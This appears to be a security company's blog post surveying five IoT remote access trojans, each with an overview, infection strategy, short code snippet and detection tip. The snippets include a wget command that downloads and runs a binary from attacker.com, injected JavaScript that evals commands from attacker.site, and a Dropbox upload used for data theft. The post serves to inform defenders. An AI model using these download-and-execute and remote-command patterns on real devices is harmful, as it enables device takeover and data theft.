Top 5 IoT Remote Access Trojans Crippling Devices in 2025

IoT Remote Access Trojans

If you think IoT devices are just harmless smart assistants or home cameras, think again. In 2025, cybercriminals are exploiting these everyday conveniences as entry points for powerful Remote Access Trojans (RATs). I’ve tracked and reverse-engineered several IoT RATs this year, and it’s clear they’re no longer script-kiddie tools. These RATs are modular, stealthy, and devastating.

In this post, I’ll walk through five of the most dangerous IoT-focused RATs currently in the wild. But before diving in, let’s quickly establish what makes an IoT RAT different from the desktop or mobile variants.

-Book Your Free Security Consultation Today!

Table of Contents

What Are IoT Remote Access Trojans?

IoT Remote Access Trojans are malware designed specifically to target and control internet-connected devices like routers, IP cameras, smart TVs, and even refrigerators. Unlike typical RATs, which rely on full operating systems like Windows or Android, IoT RATs have to operate with minimal system resources and often without standard APIs.

That constraint has pushed their developers to get creative. Most IoT RATs:

  • Exploit weak/default credentials or outdated firmware.

  • Use lightweight payloads written in C, Lua, or Python.

  • Communicate over obscure or non-standard ports.

  • Persist using cron jobs, init scripts, or patched binaries.

Here are the top offenders I’ve come across in 2025.

Check Out This Blog On How Remote Access Trojans Work

1. NOIRWorm

Overview: NOIRWorm targets consumer-grade IP cameras and DVRs. It spreads laterally within home networks and uses compromised devices for surveillance or DDoS-for-hire.

Implementation Strategy:

  • Brute-forces Telnet and SSH using hardcoded credentials.

  • Drops a statically compiled MIPS binary.

  • Connects to a Tor-hidden C2 server.

Code Walkthrough (BusyBox infection shell snippet):

				
					if wget http://attacker.com/noir -O /tmp/noir; then
    chmod +x /tmp/noir
    /tmp/noir &
fi
				
			

Detection Tip: Monitor for unknown processes running BusyBox with network sockets open. Deploy honeypots to catch brute-force attempts.

2. IoTReaper++

Overview: An upgraded version of the original IoTReaper, this variant adds WebSocket-based C2 and support for newer smart thermostats and cameras.

Implementation Strategy:

  • Scans for web interfaces on port 80/443.

  • Injects JavaScript into the device’s admin panel to create persistent sockets.

  • Controls the RAT using browser-like C2 sessions.

Code Walkthrough (Injected JavaScript payload):

				
					let ws = new WebSocket('wss://attacker.site/c2');
ws.onmessage = (event) => {
    eval(event.data);
};
				
			

Detection Tip: Analyze the source code of embedded web panels. Flag devices making unexplained persistent WebSocket connections to unknown domains.

3. ShadowBot

Overview: ShadowBot is an ARM-compiled binary that turns infected IoT devices into proxy relays and command execution nodes. It’s often found in botnets used for anonymizing cybercrime.

Implementation Strategy:

  • Uses UPnP to expose internal ports.

  • Installs custom iptables rules to route traffic.

  • Periodically polls a C2 server via DNS.

Code Walkthrough (Embedded DNS C2 resolver in C):

				
					char *lookup_domain = "cmd.shadowdns.co";
struct hostent *host = gethostbyname(lookup_domain);
if (host) {
    execute_command(host->h_addr);
}
				
			

Detection Tip: Use deep DNS inspection. Any IoT device resolving a domain multiple times per minute should raise a red flag.

4. MiraiX

Overview: MiraiX is the latest variant of the infamous Mirai botnet, redesigned for microcontrollers in smart meters and smart locks. It’s smaller, harder to detect, and runs on embedded RTOS environments.

Implementation Strategy:

  • Compiled with stripped symbols to reduce binary footprint.

  • Injects itself into firmware memory.

  • Uses MQTT for encrypted communication.

Code Walkthrough (MQTT Client Init in C++):

				
					MQTTClient client("iot-server.local", 1883);
client.setCallback([](string topic, string msg) {
    execute_command(msg.c_str());
});
client.subscribe("/iot/cmd");
				
			

Detection Tip: Inspect outbound MQTT connections. Unexpected connections to public brokers or encrypted MQTT over TCP/8883 is often suspicious.

5. PyWasp

Overview: PyWasp is a Python-based RAT deployed on Raspberry Pi-based IoT devices in industrial control systems. It’s designed for persistence and low-noise data theft.

Implementation Strategy:

  • Installs via SSH using stolen keys.

  • Uses cron jobs to survive reboots.

  • Sends logs and screen captures to Dropbox or Mega.

Code Walkthrough (Main loop):

				
					import dropbox
client = dropbox.Dropbox('ACCESS_TOKEN')
with open('/tmp/metrics.log', 'rb') as f:
    client.files_upload(f.read(), '/metrics.log')
				
			

Detection Tip: Audit cron jobs and SSH keys on embedded Linux systems. Flag IoT traffic to cloud storage services like Dropbox or Mega.

Conclusion

IoT devices are often treated as background infrastructure – plug them in, forget them. That mindset is what allows these RATs to flourish. They exploit weak configurations, hide in firmware, and communicate over unexpected protocols.

From Tor tunnels in IP cameras to MQTT in smart locks, 2025’s IoT RATs are sophisticated and quiet. They don’t just disrupt your smart home; they infiltrate corporate networks through rogue smart plugs and HVAC units.

I recommend using device discovery tools like Nmap with custom IoT signatures and combining them with memory analysis tools like Volatility or network behavior analysis with Suricata. If you’re a blue teamer, start segmenting IoT traffic, applying outbound firewall rules, and watching those low-bandwidth anomalies.


Why Businesses Trust SecureMyOrg for Comprehensive Network Security​

At SecureMyOrg, we uncover and fix all possible security vulnerabilities of mobile and web, while providing solutions to mitigate risks. We are trusted by renowned companies like Yahoo, Gojek and Rippling, and with 100% client satisfaction, you’re in safe hands!

Some of the things people reach out to us for –

  1. Building their cybersecurity program from scratch – setting up cloud security using cost-effective tools, SIEM for alert monitoring, building policies for the company
  2. Vulnerability Assessment and Penetration Testing ( VAPT ) – We have certified professionals, with certifications like OSCP, CREST – CPSA & CRT, CKA and CKS
  3. DevSecOps consulting
  4. Red Teaming activity
  5. Regular security audits, before product release
  6. Full time security engineers.

Relevant Posts

RATs Advanced Persistent Remote Access Trojans

Top 5 Advanced Persistent Remote Access Trojans (RATs) in 2025

This blog explores five of the most sophisticated Advanced Persistent Remote Access Trojans (AP-RATs) currently active in the cyber threat landscape. We analyze their infection vectors, stealth mechanisms, command-and-control infrastructure, and persistence techniques to help security professionals understand and defend against these high-risk threats.

Read More »

Subscribe to our newsletter !

Please fill the form for a prompt response!